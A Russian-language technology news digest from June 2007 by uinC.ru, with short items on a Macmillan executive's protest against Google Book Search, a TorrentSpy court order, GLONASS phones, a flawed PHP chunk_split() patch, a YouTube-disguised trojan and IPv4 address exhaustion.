Исполнительный директор издательского дома Macmillan Publishers, с приятной русскому человеку фамилией Ричард Чаркин, решил весьма необычным способом выразить свое отрицательное отношение к проекту Google Book Search. Чаркин похитил два ноутбука, принадлежащих Google, со стенда компании на выставке Book Expo America в Нью-Йорке. В рамках инициативы Google Book Search компания Google оцифровывает печатные издания, обеспечивая возможность поиска по текстам. С критикой проекта уже неоднократно выступали издатели и владельцы копирайта, обвинявшие Google в несоблюдении авторских прав на оцифровываемые книги. Дело в том, что Google удаляет из базы данных Google Book Search тексты только после соответствующего запроса со стороны издателя. Кстати, около двух месяцев назад с резкой критикой в отношении книжного поисковика Google выступила Microsoft. В корпорации заявляют, что Google индексирует все доступные книги подряд, не спрашивая разрешения владельцев копирайта. В результате, подчеркивают в Microsoft, издатели терпят серьезный ущерб, тогда как Google зарабатывают миллионы на чужом контенте. В своем блоге Ричард Чаркин отмечает, что решил опробовать на Google ту же тактику, которую компания применяет в отношении издателей. По словам Чаркина, на стенде Google не было таблички с надписью о том, что ноутбуки нельзя красть. Поэтому Чаркин просто взял два портативных компьютера и начал ждать, когда кто-нибудь заметит пропажу. Примерно через час сотрудники Google обнаружили исчезновение ноутбуков, и Чаркин по первой же просьбе возвратить компьютеры вернул их на место.
Блог Чаркина

10/06/2007 10:35 Суд обязал поисковик TorrentSpy шпионить за пользователями
29 мая суд, рассматривающий иск Американской ассоциацией кинокомпаний (МРАА) против интернет-фирмы TorrentSpy, обязал ответчиков начать сбор сведений о пользователях своей поисковой системы. Поисковик Torrentspy позволяет искать материалы, распространяющиеся через файлообменные сети с поддержкой протокола BitTorrent. В начале прошлого года МРАА обвинила BitTorrent и ряд других компаний в пособничестве пиратству путем упрощения поиска и загрузки нелегальных копий материалов, защищенных авторскими правами. В Torrentspy, в свою очередь, утверждают, что сайт компании не содержит никаких нелегальных материалов и даже ссылок на них, а за действия пользователей за пределами ресурса фирма отвечать не обязана. Как бы то ни было, но в конце прошлого месяца, по сообщению CNET News, суд вынес постановление, согласно которому TorrentSpy обязана создавать лог-файлы, содержащие информацию о том, что именно пытаются найти в Сети пользователи ее системы. Впрочем, впоследствии судья приостановил вступление решения в силу, дав TorrentSpy возможность до 12 июня подать апелляцию. Между тем, некоторые специалисты отмечают, что решение суда в отношении TorrentSpy может создать опасный прецедент. В результате, истцы начнут требовать от интернет-компаний выдачи конфиденциальных данных о пользователях даже в том случае, если это противоречит внутренней политике работы веб-сервисов. Юрист TorrentSpy Ира Роткен подчеркивает, что в том случае, если решение суда будет оставлено в силе, компании, вероятнее всего, придется закрыть доступ к своему поисковику для пользователей на территории Соединенных Штатов. Комментариев со стороны представителей Американской ассоциации кинокомпаний пока не поступало.
Источник

10/06/2007 11:17 Россия не дождется телефонов с ГЛОНАСС
В России телефон со встроенным ГЛОНАСС-модулем не имеет перспектив, считают большинство участников рынка. Единственный отечественный производитель, способный заняться производством таких устройств — «Ситроникс», — опровергает возможность их выпуска, обосновывая решение тем, что телефон будет слишком дорогим и мало кому нужным. 18 мая Президент РФ Владимир Путин издал указ «Об использовании глобальной навигационной спутниковой системы ГЛОНАСС в интересах социально-экономического развития Российской Федерации», в котором говорится, что доступ к гражданским навигационным сигналам Глобальной навигационной спутниковой системы (ГЛОНАСС) предоставляется российским и иностранным потребителям на безвозмездной основе и без ограничений. На сегодня количество одновременно работающих спутников группировки ГЛОНАСС достигает 12. Всего в системе — 17 аппаратов, работают из них 12, на техобслуживании — 3, 1 ожидает ввода в систему, 1 — вывода из нее. Доступность сервисов на территории России уже составляет 59,7% (в мире — 45,6%). Юрий Урличич, генеральный директор РНИИ КП, головной организации, отвечающей за коммерциализацию системы ГЛОНАСС, выступая на Совете главных конструкторов системы, сообщил, что в конце 2007 — начале 2008 г. могут появиться первые сотовые телефоны, оснащенные встроенным модулем навигации GPS-ГЛОНАСС. При этом, отметил он, российская компания «Ситроникс» совместно с китайскими партнерами занимается разработкой подобного устройства. Однако в пресс-службе «Ситроникса» CNews не подтвердили эту информацию. «Мы ведем в первую очередь те разработки, которые будут востребованы рынком, — сообщил наш собеседник в компании. — Сейчас мы создаем чипсет, который производители оборудования смогут использовать в ГЛОНАСС-приемниках. Всегда необходимо отталкиваться от спроса. Те, кому необходима система глобального позиционирования, будут покупать отдельные приемники». Сроки выхода приемника ГЛОНАСС с чипсетом «Ситроникс» и возможность его появления вообще пока неизвестны. Аналитики также считают, что у телефонов с ГЛОНАСС-модулями, даже если они вдруг и появятся, нет будущего.
Более подробно

10/06/2007 12:19 Патч к PHP 5.2.3 оказался нерабочим
Обновлённая версия серверного языка веб-программирования PHP, 5.2.3, предназначенная для исправления уязвимости, не выполнила своей задачи, утверждает Стефан Эссер (Stefan Esser), соучредитель «Месячника уязвимостей PHP». Ошибка переполнения целочисленного значения в функции chunk_split(), разбивающей строку на подстроки по шаблонам, по-прежнему присутствует. В результате ошибки может переполниться область динамически выделяемой памяти, и интерпретатор завершится аварийно. В худшем случае, которого, однако, пока не произошло, возможна инъекция постороннего кода. Разработчики просто перенесли проблему в другую строку кода. В настоящее время выпущен эффективный патч, о чём объявлено в CVS. Впрочем, эффективность этого патча также ставится под сомнение: для подсчёта памяти, выделяемой функции, теперь используется значение с плавающей точкой, преобразуемое затем в целочисленное. В результате для очень больших чисел может быть выделено меньшее количество памяти.
Источник

10/06/2007 12:51 У YouTube появился свой троян
В Сети появился новый троян, который маскируется под видеофайл для популярного сервиса YouTube, сообщает компания интернет-безопасности Websense. Троян называется YouTube04567. Он помещается на видеосервис Google под видом одного из смешных роликов, а после того как пользователь пытается посмотреть файл, троян попадает на ПК и скачивает оттуда ценную информацию.
Подробнее о трояне

10/06/2007 13:25 Запас IP-адресов подходит к концу
Американское бюро регистрации номеров Internet (American Registry for Internet Numbers, ARIN) объявило о том, что отныне будет активно поощрять организации к переходу на новую версию протокола IP - IPv6. ARIN отвечает за выдачу блоков IP-адресов североамериканским Internet-провайдерам и предприятиям. Организация распределяла адреса IPv6 с 1999 года, но до настоящего времени не призывала к переходу на новую версию протокола. В начале мая попечительский совет ARIN принял резолюцию об изменения политики организации в этом отношении. Согласно заявлению ARIN, запас адресов IPv4 истощился до такой степени, что миграция на IPv6 настоятельно необходима для всех приложений, требующих непрерывной доступности новых IP-адресов.
Источник


Архив рассылки новостей:
http://uinc.ru/news/archive/


На этом пока все.
Всем удачи.
uinC Team
http://uinc.ru

P.S. Все предложения, замечания и просьбы оставлять здесь:
http://uinc.ru/news/sendnews.php

Любые материалы с нашего сайта или рассылки не могут быть скопированы без разрешения автора или администрации сервера uinC.ru